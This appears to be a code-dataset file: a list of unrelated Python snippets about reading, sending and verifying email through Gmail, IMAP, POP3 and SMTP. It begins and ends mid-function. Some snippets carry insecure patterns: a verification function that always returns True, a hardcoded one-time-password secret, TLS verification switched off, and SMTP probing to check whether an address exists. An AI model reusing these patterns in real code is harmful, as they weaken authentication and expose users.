print(datetime.utcnow())\n\n ######################################################\n # msg = service.users().messages().get(userId='me', id=message1['id'], format='full').execute()\n # # parts can be the message body, or attachments\n # payload = msg['payload']\n # headers = payload.get(\"headers\")\n # parts = payload.get(\"parts\")\n # # print(payload)\n # # print(parts)\n # # print(headers)\n # for header in headers:\n # print(header['name'])\n # print(header['value'])\n #\n ######################################################\n msg = service.users().messages().get(userId='me', id=message1['id']).execute()\n\n # Use try-except to avoid any Errors\n try:\n # Get value of 'payload' from dictionary 'txt'\n payload = msg['payload']\n headers = payload['headers']\n subject = ''\n sender = ''\n\n # Look for Subject and Sender Email in the headers\n for d in headers:\n if d['name'] == 'Subject':\n subject = d['value']\n if d['name'] == 'From':\n sender = d['value']\n # The Body of the message is in Encrypted format. So, we have to decode it.\n # Get the data and decode it with base 64 decoder.\n parts = payload.get('parts')[0]\n data = parts['body']['data']\n data = data.replace(\"-\", \"+\").replace(\"_\", \"/\")\n decoded_data = base64.b64decode(data)\n\n # Now, the data obtained is in lxml. So, we will parse\n # it with BeautifulSoup library\n soup = BeautifulSoup(decoded_data, \"lxml\")\n body = soup.body()\n\n # Printing the subject, sender's email and message\n print(\"Subject: \", subject)\n print(\"From: \", sender)\n print(\"Message: \", body)\n # for link in soup.find_all('a', href=True):\n # print(link['href'])\n link = soup.find('a', href=True)\n print(link['href'])\n except:\n pass", "def getIdeaUrlsFromEmail():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n\n lists,nextPageToken = ListMessages(service,user_id = 'me',q='from:noreply@tradingview.com')\n # print (lists)\n mes,mes_str = GetMimeMessage(service,user_id = 'me',msg_id = lists[0]['id'])\n # print (mes)\n j = 0\n urls = []\n for part in mes.walk(): \n j = j + 1 \n fileName = part.get_filename() \n contentType = part.get_content_type() \n mycode=part.get_content_charset(); \n # 保存附件 \n if fileName:\n print ('保存邮件附件……TODO?')\n elif contentType == 'text/html': #or contentType == 'text/plain' \n #保存正文 \n data = part.get_payload(decode=True) \n content=str(data); \n # if mycode=='gb2312': \n # content= mbs_to_utf8(content) \n #end if \n # nPos = content.find('降息') \n # print(\"nPos is %d\"%(nPos)) \n # print >> f, data \n # 正则替换掉所有非 <a></a>的标签 <[^>|a]+>\n # reg = re.compile('<[^>|a]+>')\n # print (content)\n url,title = findIdeaUrlInHtml(content)\n urls.append((url,title))\n # print (url,title)\n # contentTxt = re.compile('<[^>|a]+>').sub('',content)\n # print (reg.sub('',content))\n # #end if \n\n return urls", "def gmail(arg):\n if not arg:\n return GOOGLE_MAIL\n search_content = arg\n account_num = '0'\n ret_url = GOOGLE_MAIL + account_num + (('/#search/' + search_content) if search_content else '')\n print('returning url {}'.format(ret_url))\n return ret_url", "def readMail(m, msgNum):#Read a particular email\n resp, data = m.fetch(msgNum, \"(RFC822)\")\n email_body = data[0][1]\n mail = email.message_from_string(email_body)\n #temp = m.store(emailid,'+FLAGS', '\\\\Seen')\n m.expunge()\n\n\n return mail", "def IsGoogler():\n p = subprocess.run('goma_auth info',\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True,\n shell=True)\n if p.returncode != 0:\n return False\n lines = p.stdout.splitlines()\n if len(lines) == 0:\n return False\n l = lines[0]\n # |l| will be like 'Login as <user>@google.com' for googler using goma.\n return l.startswith('Login as ') and l.endswith('@google.com')", "def verify_mail(self):\n raise NotImplementedError", "def fetch_mailbox((mailbox, host, user, passwd)):\r\n\r\n global text, attachments\r\n\r\n ## login to the pop3 server ==============================\r\n print\r\n print \"###### Connecting to %s\" % host\r\n M = poplib.POP3(host)\r\n M.set_debuglevel(1)\r\n M.user(user)\r\n M.pass_(getpass.getpass())\r\n\r\n ## create the mailbox and attachments directories if required\r\n if not os.path.exists (mailboxdir):\r\n print \"Creating Directory %s\", mailboxdir\r\n os.mkdir (mailboxdir)\r\n\r\n att_dir = \"%s\\\\att_%s\" % (mailboxdir, mailbox)\r\n if not os.path.exists (att_dir):\r\n print \"Creating Directory %s\", att_dir\r\n os.mkdir (att_dir)\r\n\r\n \r\n ## get list of uidls in the mailbox file =================\r\n uidls = get_mailbox_uidls(mailbox)\r\n\r\n ## get number of messages ================================\r\n numMessages = len(M.list()[1])\r\n print \"There are %d messages on the server\" % numMessages\r\n\r\n\r\n ## get uidls from server and compare with the uidls in the\r\n ## mailbox ===============================================\r\n uidls_srv = M.uidl()\r\n list = uidls_srv[1]\r\n fetchlist = []\r\n for item in list:\r\n msgno, uidl = item.split(' ')\r\n msgno = int(msgno)\r\n if not uidl in uidls:\r\n print \"Found new message: (%d, %s)\" % (msgno, uidl)\r\n fetchlist.append(msgno)\r\n\r\n print \"There are %d new messages on the server\" % len(fetchlist)\r\n\r\n alltext = \"\" ## this variable contains the mbox contents\r\n\r\n ## go over all of the emails =============================\r\n for i in fetchlist:\r\n\r\n flatmsg = \"\"\r\n\r\n ## retreive message\r\n# for line in M.retr(i+1)[1]:\r\n for line in M.retr(i)[1]:\r\n flatmsg += line + \"\\r\\n\"\r\n\r\n ## parse message\r\n msg = email.message_from_string (flatmsg)\r\n\r\n ## handle Email.message object\r\n title = handleMsg(mailbox, msg)\r\n\r\n\r\n msgtext = \"%s\\n%s* UIDL: %s\\n%s\\n\\n\" % (''.center(70,'#'), title, uidl, text)\r\n if not attachments == \"\":\r\n msgtext += \"#### Attachments:\\n%s\" % attachments\r\n\r\n alltext = msgtext.replace('\\r\\n','\\n') + alltext\r\n\r\n ## add 'alltext' to the beginning of the mailbox file ====\r\n mboxfile = \"%s\\\\%s.mbx\" % (mailboxdir, mailbox)\r\n contents = \"\"\r\n if os.path.exists(mboxfile):\r\n mbox = open(mboxfile, \"rt\")\r\n contents = mbox.read()\r\n mbox.close()\r\n\r\n mbox = open(mboxfile, \"wt\")\r\n mbox.write (alltext)\r\n if contents != \"\":\r\n mbox.write (contents)\r\n\r\n mbox.close()\r\n\r\n return len(fetchlist)", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n\n FPS = 30\n WINDOWWIDTH = 480\n WINDOWHEIGHT = 320\n\n WHITE = (255, 255, 255)\n RED = (255, 0, 0)\n BLUE = (0, 0, 255)\n GREEN = (0, 255, 0)\n BLACK = (0, 0, 0)\n LIGHTGREEN = (53, 230, 97)\n LIGHTBLUE = (53, 156, 230)\n LIGHTORANGE = (242, 109, 19)\n\n windowBgColor = WHITE\n\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURFACE = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n pygame.display.set_caption('PLUTO')\n\n myfont = pygame.font.Font(None, 30)\n label = myfont.render(\"<-- Enter address\", 1, BLACK)\n\n buttonEnterEmail = pygbutton.PygButton((10, 10, 100, 80), 'Enter Email', bgcolor=LIGHTORANGE)\n buttonScan = pygbutton.PygButton((10, 100, 225, 210), 'Scan and Send', bgcolor=LIGHTGREEN, font=myfont)\n buttonReceive = pygbutton.PygButton((245, 100, 225, 210), 'Receive and Print', bgcolor=LIGHTBLUE, font=myfont)\n buttonPrintICR = pygbutton.PygButton((370, 10, 100, 80), 'Letterhead', bgcolor=RED)\n winBgButtons = (buttonEnterEmail, buttonScan, buttonReceive, buttonPrintICR)\n\n allButtons = winBgButtons\n\n userinput = \"\"\n\n while True:\n for event in pygame.event.get(): # event handling loop\n \n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n if 'click' in buttonReceive.handleEvent(event): #User called for printing of file\n \n idenListCurr = ListMessagesMatchingQuery(service, 'me', 'in:inbox')\n idenListLast = None\n \n #if idenListLast != idenListCurr: #to be used in future with inbox functionality\n\n #msgList = [] #should be a way to do this where only add the new messages\n \n #for each in idenListCurr:\n #iden = each[u'id']\n #mimeMsg = GetMimeMessage(service, 'me', iden)\n \n #msgList.append(mimeMsg)\n\n #idenListLast = idenListCurr\n \n\n #displayInterface(msgList)\n htmlMsg = GetRawMessageHtml(service, 'me', idenListCurr[0][u'id'])\n writeFile(htmlMsg, \"temp\", \"html\")\n \n try:\n pdfkit.from_file(\"/home/pi/git/PlutoTest/temp.html\", \"temp.pdf\") #change to your directory\n except IOError:\n pass\n \n popup = Popup(DISPLAYSURFACE)\n tempInput = popup.run(\"Your message will print\")\n printCups.executePrint(\"/home/pi/git/PlutoTest/temp.pdf\") #change to your directory\n os.remove(\"/home/pi/git/PlutoTest/temp.pdf\") #change to your directory\n os.remove(\"/home/pi/git/PlutoTest/temp.html\") #change to your directory\n time.sleep(5)\n \n if 'click' in buttonScan.handleEvent(event):#user called for scanning and sending of file\n scan.executeScan(\"temp\")\n \n message = CreateMessageWithAttachment(\"example.pluto.email@gmail.com\", userinput, \"Hello from Pluto!\", \"Enjoy!\",\n \"/home/pi/git/PlutoTest/\", \"temp.png\") #change to your email, directory\n SendMessage(service, 'me', message)\n \n \n os.remove(\"/home/pi/git/PlutoTest/temp.png\") #change to your directory\n popup = Popup(DISPLAYSURFACE)\n tempInput = popup.run(\"Your message has been sent\")\n print(\"sent\")\n time.sleep(5)\n \n if 'click' in buttonEnterEmail.handleEvent(event): #user called to enter e-mail address\n vkeybd = VirtualKeyboard(DISPLAYSURFACE)\n tempInput = vkeybd.run(\"...\")\n if tempInput != \"...\":\n userinput = tempInput\n label = myfont.render(\"To: \" + userinput, 1, BLACK)\n \n if 'click' in buttonPrintICR.handleEvent(event): #user called to print letterhead\n popup = Popup(DISPLAYSURFACE)\n tempInput = popup.run(\"The letterhead will print\")\n printCups.executePrint(\"/home/pi/git/PlutoTest/DemoPaper.png\") #change to your directory\n time.sleep(5)\n\n\n DISPLAYSURFACE.fill(windowBgColor)\n\n for b in allButtons:\n b.draw(DISPLAYSURFACE)\n\n # draw the text onto the surface\n DISPLAYSURFACE.blit(label, (120, 35, 350, 80))\n\n pygame.display.update()\n FPSCLOCK.tick(FPS)", "def get_unread_email_data(gmail_client):\n unread_ids = get_unread_email_ids(gmail_client)\n\n for message_id in unread_ids:\n remove_unread_label = {'removeLabelIds': ['UNREAD']}\n gmail_client.users().messages().modify(userId='me', id=message_id, body=remove_unread_label).execute()\n\n message_data = gmail_client.users().messages().get(userId='me',id=message_id).execute()\n message_payload = message_data['payload']\n has_attachment = 0 < len([part for part in message_payload['parts'] if part['mimeType'] == 'image/jpeg'])\n \n message_headers = message_payload['headers']\n sender = [header['value'] for header in message_headers if header['name'] == 'Return-Path'][0]\n yield sender, has_attachment", "def get_emails():\n\n # generate the gmail api service\n service = build_gmail_api_v1()\n\n # compute date for one year ago\n today = date.today()\n one_year_ago = today - timedelta(days=365.25)\n start = one_year_ago - timedelta(days=1)\n end = one_year_ago + timedelta(days=1)\n start_string = start.strftime(\"%Y/%m/%d\")\n end_string = end.strftime(\"%Y/%m/%d\")\n query_string = f'after:{start_string} before:{end_string}'\n\n # generate the gmail api request (get list of messages from one year ago)\n request = service.users().messages().list(userId='me', q=query_string)\n\n # try to get the api response\n try:\n response = request.execute()\n except HTTPError as e:\n print('Error response status code : {0}, reason : {1}'.format(\n e.resp.status, e.error_details))\n return []\n\n # get list of message ids from the api response\n messages = list(response[\"messages\"])\n ids = [message[\"id\"] for message in messages]\n\n # store all emails in a list\n data_to_display = []\n\n # loop through each message id\n for id in ids:\n\n try:\n # store email data in a dict\n email = {}\n\n # get message data by querying gmail api using message id\n request = service.users().messages().get(userId='me', id=id)\n response = request.execute()\n\n # get date, subject, from, to, etc from message header\n headers = list(response[\"payload\"][\"headers\"])\n looking_for = [\"Date\", \"Subject\", \"From\", \"To\"]\n for header in headers:\n if header[\"name\"] in looking_for:\n email[header[\"name\"]] = header[\"value\"]\n\n # try to get message body (base64) from response\n # the json structure varies a lot so that is why there are no many try/except\n try:\n base64_message = response[\"payload\"][\"parts\"][0][\"parts\"][0][\"body\"][\"data\"]\n except (KeyError, TypeError) as e:\n try:\n base64_message = response[\"payload\"][\"parts\"][1][\"body\"][\"data\"]\n except (KeyError, TypeError, IndexError) as e:\n try:\n base64_message = response[\"payload\"][\"parts\"][0][\"body\"][\"data\"]\n except (KeyError, TypeError, IndexError) as e:\n try:\n base64_message = response[\"payload\"][\"body\"][\"data\"]\n except (KeyError, TypeError, IndexError) as e:\n base64_message = \"Ti9B\"\n\n # decode the email body\n email[\"body\"] = base64.urlsafe_b64decode(\n base64_message).decode('utf-8')\n\n # populate list with email\n data_to_display.append(email)\n\n except HTTPError as e:\n print('Error response status code : {0}, reason : {1}'.format(\n e.resp.status, e.error_details))\n\n return data_to_display", "def Check_SMTP(name, my_ip):\n\n if nslookup(name)[0] != 0:\n add_info (name, SMTP_SERVER, \"cannot resolve SMTP server\")\n return 1\n if ping_machine(name) != 0:\n add_info(name, SMTP_SERVER, \"cannot ping SMTP server\")\n return 2\n\n status, err = tryconnect(name, SMTP_PORT)\n if status == 1 or status == 2:\n add_info(name, SMTP_SERVER, err)\n if status == 1:\n # if we time'd out, things can still be OK (say reverse DNS problems)\n # so return only an error if no timeout\n return 3\n\n stat, out = port_talker.TCPTalk(name, SMTP_PORT,\n 60, # timeout (>30sec for messed up servers)\n \"HELO \" + my_ip + \"\\r\\nQUIT\\r\\n\",\n None, # terminator\n 1024, # max len\n 1) # use external resolver\n\n # expected answer:\n #220 'mail.forobozz.com' ESMTP\n #250 mail.frobozz.com Hello grue.frobozz.com [192.168.0.21], pleased to meet ya\n #221 mail.frobozz.com closing connection\n\n # Each line can be repeated several times, so we check that all codes appear\n # and that no other codes appear\n codes = map(lambda x: x[:4], string.split(out, '\\n'))\n valid_codes = ('220 ', '250 ', '221 ', '')\n try:\n for code in codes:\n assert(code in valid_codes)\n for valid in valid_codes:\n assert(valid in codes)\n except:\n # If we wanted, we could check whether reverse DNS lookup is not working.\n # This would be the most likely explanation\n add_info(name, SMTP_SERVER, \"cannot HELO SMTP server\")\n return 4\n add_info(name, SMTP_SERVER, \"OK\")\n return 0", "def verify_email_address(\n email,\n from_host='i3visio.com',\n from_email='verify@i3visio.com'\n ):\n e = VerifyEmail()\n\n try:\n status = e.verify(email, from_host, from_email)\n if status == e.EMAIL_FOUND:\n return 1\n except Exception:\n return -1\n return 0", "def find_unread(mailbox):\n # Not checking here would make the case where there are messages quicker\n numunseen = findall(rb'\\d+', mailbox.status('Inbox', '(UNSEEN)')[1][0])\n if numunseen == [b'0']:\n return ['There are no unread messages']\n\n mailbox.select('inbox')\n res, data = mailbox.search(None, 'UNSEEN')\n if res != 'OK':\n raise RuntimeError('error in search call')\n unseen = data[0].split()\n unseen.reverse()\n messagecount = user.capitalize() + ' : {} new messages'.format(len(unseen))\n meslist = [get_from_subject(mesid, mailbox).strip() for mesid in unseen]\n return [messagecount] + meslist", "def report_to_mothership():\n # no good, always returns 127.0.1.1\n #ipaddress = socket.gethostbyname(socket.gethostname())\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"gmail.com\",80))\n ipaddress = (s.getsockname()[0])\n s.close()\n payload = {'request': 'report','ip': ipaddress,'type': config.type}\n if requests.get(config.baseurl,params=payload,auth=HTTPBasicAuth(config.user, config.password),verify=False):\n return True\n return False", "def getMail():\n\n while 1:\n #if 1==1:\n \n try:\n Mailbox = poplib.POP3(c.Server['host'], c.Server['port']) \n Mailbox.user(c.Server['username']) \n Mailbox.pass_(c.Server['password']) \n numMessages = len(Mailbox.list()[1])\n \n \n log.info(\"Connected to %s and there are %i messages\"%(c.Server['host'], numMessages))\n \n for i in range(numMessages):\n msg = Mailbox.top(i+1, 10000)\n #msg = Mailbox.retr(i+1) # removes messages\n qIncomingMail.put(msg)\n log.debug(\"getMail: put message %i in queue\"%i)\n Mailbox.quit()\n \n except:\n log.error(\"Failed to connect to %s\"%c.Server['host'])\n time.sleep(60)", "def check_auth():", "def test_good_email():\n good_email = \"me@dom.com\"\n m = CannedRe.EMAIL.match(good_email)\n # print getmembers(m)\n assert m is not None, \"Canned RegEx email test failed for %s\" % good_email\n assert m.string == good_email", "def telegram_check():\n hotp = pyotp.HOTP('base32secret3232')\n random_seed = random.randint(9999, 99999)\n tkinter.messagebox.showinfo(\"\", \"Ga naar: http://t.me/BevFietsBot\" + \"\\nen stuur deze code: \" + hotp.at(random_seed)\n + \"\\nGa na versturen verder.\")\n telegram_output = telegram_read()\n\n if hotp.verify(telegram_output, random_seed):\n return 1\n else:\n tkinter.messagebox.showinfo(\"\", \"Inlog gegevens niet correct\")\n return 0", "def get_messages(user, password, server=\"pop.gmail.com\"):\n\n # define our connection\n pop_conn = poplib.POP3_SSL(server)\n pop_conn.user(user)\n pop_conn.pass_(password)\n\n # Get message tuples from server:\n tuples = [pop_conn.retr(i) for i in range(1, len(pop_conn.list()[1]) + 1)]\n pop_conn.quit()\n\n # returns the message objects in a list, discarding the other fields\n return [msg[1] for msg in tuples]", "async def verify_email(message, *args):\n\n (email,) = args\n try:\n valid = email_validator.validate_email(email)\n email = valid.email\n domain = valid.domain\n if domain != \"purdue.edu\":\n await message.author.send(\n embed=utils.create_embed(\n \"**INVALID EMAIL**: The email must be a purdue.edu email address.\"\n )\n )\n else:\n match = database.get_student_by_email(email)\n if match:\n if database.column_name_index(\"validated\", MEMBERS_COLUMNS, match) == 1:\n await message.author.send(\n embed=utils.create_embed(\n \"This email is already verified. If this is in error, contact an officer.\"\n )\n )\n else:\n await message.author.send(\n embed=utils.create_embed(\n \"You have already received a token, please check your spam and use `!validate <token>`!\"\n )\n )\n else:\n await message.author.send(\n embed=utils.create_embed(\n \"Sending verification email to {0}...\".format(email)\n )\n )\n record = await utils.lookup_student(email, message)\n if not record.success:\n await message.author.send(embed=utils.create_embed(record.error))\n await client.update_channel.send(\n embed=utils.create_embed(record.log)\n )\n return\n mail.send_mail(\n database.column_name_index(\"email\", MEMBERS_COLUMNS, record.record),\n \"b01lers discord verification\",\n \"Welcome, {0}, to b01lers! Please paste the following command into your DM with b01lers-bot: '!validate {1}'\".format(\n database.column_name_index(\n \"name\", MEMBERS_COLUMNS, record.record\n ),\n database.column_name_index(\n \"token\", MEMBERS_COLUMNS, record.record\n ),\n ),\n )\n await message.author.send(\n embed=utils.create_embed(\"Done! Please check your inbox.\")\n )\n database.add_student(record.record)\n logging.debug(\"Verified student with record {0}\".format(record.record))\n except email_validator.EmailNotValidError as e:\n await message.author.send(\n embed=utils.create_embed(\"**INVALID EMAIL**: {0}\".format(str(e)))\n )\n\n return", "def verify_email(uid, token):\n return True", "def search(folderName):\n\n result, data = mailBox.select(folderName, True)\n\n if TESTING:\n searchResult, uid = mailBox.uid('SEARCH', None, 'UNSEEN')\n else:\n searchResult, uid = mailBox.uid('SEARCH', None, 'ALL')\n\n number_messages = len(uid[0].split(' ')) if uid[0] != \"\" else 0\n if number_messages == 0:\n print \"\\nERROR: No messages found in %s\\n\" % folderName\n print \"\\n* Exiting... *\\n\"\n sys.exit(0)\n print \"\\nNumber of messages in %s: %d\" % (folderName, number_messages)\n\n uidList = \"\"\n for i in uid[0].split(' '):\n if i.isdigit():\n uidList += i + \",\"\n uidList = uidList[:-1]\n\n return uidList", "def get_new_mails(self):\n\t\tif cint(self.settings.use_imap):\n\t\t\tself.imap.select(\"Inbox\")\n\t\t\tif self.settings.no_remaining == '0' and self.settings.uidnext:\n\t\t\t\tif self.settings.uidnext == self.settings.newuidnext:\n\t\t\t\t\treturn False\n\t\t\t\telse:\n\t\t\t\t\t#request all messages between last uidnext and new\n\t\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse, message = self.imap.uid('search', None, \"ALL\")\n\t\t\temail_list = message[0].split()\n\t\telse:\n\t\t\temail_list = self.pop.list()[1]\n\n\t\treturn email_list", "def isEmailUsed(self, email):\n\n\t\ttestq = {\"email\": email};\n\t\ttest_result = self.db.request(\"getOne\", testq);\n\n\t\tif test_result:\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def opt_in(msg_hash):\r\n email, removed = Email.handler.opt_in(msg_hash)\r\n if email and removed:\r\n Email.handler.add_to_queue(None, None, [email], \"reddit.com\",\r\n datetime.datetime.now(g.tz),\r\n '127.0.0.1', Email.Kind.OPTIN)\r\n return email, removed", "def _get_unread_emails(conn):\n pattern = re.compile('^\\d+\\ \\(ENVELOPE\\ \\(\"(.*?)\"\\ \"(.*?)\"\\ \\(\\(\"(.*?)\"\\ .*?\\ \"(.*?)\"\\ \"(.*?)\"\\)\\).*$')", "def verify(\n self,\n email,\n from_host='example.com',\n from_email='verify@example.com'\n ):\n if DEBUG:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n if not EMAIL_RE.search(email):\n logging.debug(f\"'{email}' is not a valid email\")\n return self.EMAIL_NOT_FOUND\n\n try:\n hostname = email.strip().split('@')[1]\n socket.gethostbyname(hostname)\n mail_exchangers = query_mx(hostname)\n except Exception as e:\n logging.debug(e)\n raise e\n\n logging.debug(f\"Found mail exchangers: {mail_exchangers}\")\n for i, mx in enumerate(mail_exchangers):\n mx_name = mx[1]\n logging.debug(f\"Testing {mx_name} (#{i})...\")\n\n logging.debug(f\"\\tConnecting to {mx_name}\")\n server = self.connect(mx_name)\n\n if not server:\n logging.debug(\"\\tCould not get connected to server.\")\n continue\n\n if DEBUG:\n server.set_debuglevel(1)\n\n logging.debug(\"\\tDo helo...\")\n try:\n code, resp = server.helo(mx_name)\n if code != 250:\n if not self.unverifiable(resp):\n raise UnableToVerifyException()\n continue\n except:\n pass\n\n logging.debug(\"\\tDo mail:\")\n try:\n code, resp = server.mail(from_email)\n logging.debug(f\"Code: {code}\")\n logging.debug(f\"Response: {resp}\")\n if code != 250:\n if not self.unverifiable(resp):\n raise UnableToVerifyException()\n continue\n except:\n pass\n\n try:\n logging.debug(\"\\tDo rcpt:\")\n code, resp = server.rcpt(email)\n logging.debug(f\"\\t\\tCode: {code}\")\n logging.debug(f\"\\t\\tResponse: {resp}\")\n\n if code != 250:\n if self.nonexistent(resp):\n return self.EMAIL_NOT_FOUND\n elif self.unverifiable(resp):\n raise UnableToVerifyException()\n else:\n continue\n except:\n pass\n\n try:\n logging.debug(\"\\tDo data:\")\n code, resp = server.data('Ahoy. Are you there? Testing my python3 port of the package ;) {0}.{0}'.format(_smtp.CRLF))\n logging.debug(f\"\\t\\tCode: {code}\")\n logging.debug(f\"\\t\\tResponse: {resp}\")\n if code != 250:\n if self.nonexistent(resp):\n return self.EMAIL_NOT_FOUND\n elif self.unverifiable(resp):\n raise UnableToVerifyException()\n elif code == 250:\n return self.EMAIL_FOUND\n except:\n pass\n\n raise UnableToVerifyException()", "def import_email(email, nickname, init_cache, quiet):\n\n gmail = GmSync(email, nickname, load_config(not quiet))\n gmail.pull()\n if init_cache:\n print('fetching cacheable messages')\n gmail.init_cache()", "def get_unread_count(imap):\n status, messages = imap.select('Inbox')\n status, response = imap.uid('search', None, 'UNSEEN')\n unread_msg_nums = response[0].split()\n return len(unread_msg_nums)", "def verify_email(entered_email):\n return EMAIL_RE.match(entered_email)", "def check_email(request):\n\temail_id = str(request.GET['id'])\n\tuser = User.objects.filter(username=email_id,is_active=1).exists()\n\tif user:\n\t\treturn HttpResponse(1)\n\telse:\n\t\treturn HttpResponse(0)", "def test_email_good(get_email, capsys):\n e = get_email\n e.send()\n out, err = capsys.readouterr()\n assert \"Message sent\" in out", "def is_replied_to(thread):\r\n messages = thread['messages']\r\n if len(messages) < 2:\r\n return False\r\n user_email = get_sender_email(messages[0])\r\n for i in range(1, len(messages)):\r\n sender_email = get_sender_email(messages[i])\r\n if user_email != sender_email:\r\n return True\r\n return False", "def email(request, error='', message=''):\n output = ''\n try:\n host = settings.EMAIL_HOST\n imap = settings.EMAIL_IMAP\n eddress = settings.EMAIL_HOST_USER\n password = settings.EMAIL_HOST_PASSWORD\n port = settings.EMAIL_PORT\n prefix = settings.EMAIL_SUBJECT_PREFIX\n except:\n error += 'ERROR: You haven\\'t configured e-mail in settings.py.'\n if error == '':\n mail = imaplib.IMAP4_SSL(imap)\n mail.login(eddress, password)\n mail.select(\"inbox\")\n result, data = mail.uid('search', None, \"ALL\")\n uids = data[0].split()\n emails = []\n for u in uids:\n result, data = mail.uid('fetch', u, '(RFC822)')\n raw_email = data[0][1]\n email_message = message_from_string(raw_email)\n for part in email_message.walk():\n if part.get_content_type() == 'text/plain':\n output += 'PART: ' + str(part.get_payload()) + '\\n'\n return render_to_response('feedback/email.html', {'error': error, 'message': message, 'output': output}, context_instance=RequestContext(request))", "def check_google_token():\n #get token from login page and google's token rigamorole\n gtoken = request.form.get(\"idtoken\")\n #validate token\n g_profile = apiapijoyjoy.validate_google_token(gtoken)\n #collect user info from google\n name = g_profile['given_name']\n lname = g_profile['family_name']\n email = g_profile['email']\n # start a session\n session[\"user_id\"] = email\n user = User.query.filter_by(email=email).first()\n #create flags for Flask to return to google's scripts and take frontend action accordingly\n if user:\n return \"FLASK SEES USER\"\n else:\n #create new user in SQLAlchemy using info above from Google. BUT WAIT WHAT?! CODE REVIEW PLS!\n new_user = User(email=email, name=name, lname=lname)\n db.session.add(new_user)\n db.session.commit()\n return \"FLASK SEES NO USER\"", "def check_mail(eml):\n return eml[::-1] if eml != '#N/A' else '#N/A'", "def __get_emails(self):\n # This returns a list of Gmail message objects. Documentation can be found at\n # https://developers.google.com/gmail/api/v1/reference/users/messages/list\n return self.__service.users().messages().list(userId='me').execute()['messages']", "def get_mail() -> imaplib.IMAP4_SSL:\n mail = imaplib.IMAP4_SSL(config['mail']['imap'])\n mail.login(USER_MAIL, PASS_MAIL)\n mail.list()\n mail.select('inbox')\n return mail", "def gmailtoken_generator():\r\n # If modifying these scopes, delete the file token.pickle.\r\n # SCOPES = ['https://www.googleapis.com/auth/gmail.readonly']\r\n SCOPES = ['https://www.googleapis.com/auth/gmail.send']\r\n\r\n creds = None\r\n # The file token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n if os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'credentials.json', SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n service = build('gmail', 'v1', credentials=creds)", "def api_check_email(request):\n email = request.matchdict['email']\n check_email = RepositorioUsario.check_email(request, email)\n\n return check_email", "def get(self, request, format=None):\n user_social_auth = UserSocialAuth.objects.get(user=self.request.user)\n credentials = AccessTokenCredentials(user_social_auth.extra_data['access_token'],\n 'my-user-agent/1.0')\n http = httplib2.Http()\n http = credentials.authorize(http)\n service = discovery.build('gmail', 'v1', credentials=credentials)\n results = service.users().messages().list(userId='me').execute()\n messages = []\n for result in results['messages'][:100]:\n \n msg = service.users().messages().get(userId='me', id=result['id']).execute()\n subject = ''\n _from = ''\n for header in msg['payload']['headers']:\n if header['name'] == 'Subject':\n subject = header['value']\n elif header['name'] == 'From':\n _from = header['value']\n messages.append({'subject': subject, 'from': _from})\n \n return Response(messages)", "def verify_GIF_sent(gif_ID):\n try:\n messages = driver.find_elements_by_class_name('m-messenger__message-content')\n gif = messages[-1].find_element_by_tag_name('img')\n src = gif.get_attribute('src')\n actual_gif_ID = src[src.index('media/') + len('media/'):]\n actual_gif_ID = actual_gif_ID[:actual_gif_ID.index('/')]\n #print(gif_ID)\n #print(actual_gif_ID)\n return gif_ID == actual_gif_ID\n except Exception as e:\n #print(str(e))\n return False", "def test_sendEmailVerification(self, testUser):\n with mail.record_messages() as outbox:\n testUser.send_email_verification()\n assert len(outbox) == 1\n msg = outbox[0]\n assert \"jjones@yahoo.com\" in msg.recipients\n assert msg.subject == 'Ask Your Peeps: Email Verification'\n assert 'To verify your email' in msg.body\n assert 'Dear John' in msg.body", "def email_checker(email):\n regex = '^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$'\n if re.search(regex, email):\n return True\n else:\n return False", "def email_body_verify_email_address(url, code): #bug267\n\tmsg = \"\"\n\treturn msg", "def check_account(url):\n \n slug = url.replace('http://', '').replace('/', '-')\n \n filename = \"hash_\" + slug + \".sha256\"\n \n import re\n \n user = re.search('/\\d/(.*?)/$', url).group(1)\n \n games = get_games(url)\n\n new_hash = hash(games)\n old_hash = ''\n\n try:\n with open (filename) as hash_file:\n old_hash = hash_file.read()\n except:\n old_hash = ''\n \n if new_hash != old_hash:\n message = 'Map: %s\\r\\nType: %s\\r\\nOutcome: %s\\r\\nDate: %s\\r\\n' %(games[0]['map'], games[0]['type'], games[0]['outcome'], games[0]['date'])\n \n send_mail(user + ' played SC2', message)\n\n with open (filename, \"w\") as hash_file:\n hash_file.write(new_hash)", "def _check_has_message(data):\r\n return re.match(r'^:[a-zA-Z0-9_]+\\![a-zA-Z0-9_]+@[a-zA-Z0-9_]+'\r\n r'\\.tmi\\.twitch\\.tv '\r\n r'PRIVMSG #[a-zA-Z0-9_]+ :.+$', data)", "def checkemail(emailtxt, mdtype):\n score = 0 # only allow scores if the emailaddress is okay. Issue #17\n if emailtxt.find(\"@\") == -1 or emailtxt.find(\".\") == -1 or len(emailtxt) < 3:\n score = 0\n if mdtype == \"dataset\" or mdtype == \"series\":\n # checkid = 7, so the index in the matrix is: 6\n result = checksdatasets[6][2][score]\n else:\n result = checksservices[6][2][score]\n return MkmScore(emailtxt, score, result)", "def sendEmailTo(to):\n try:\n 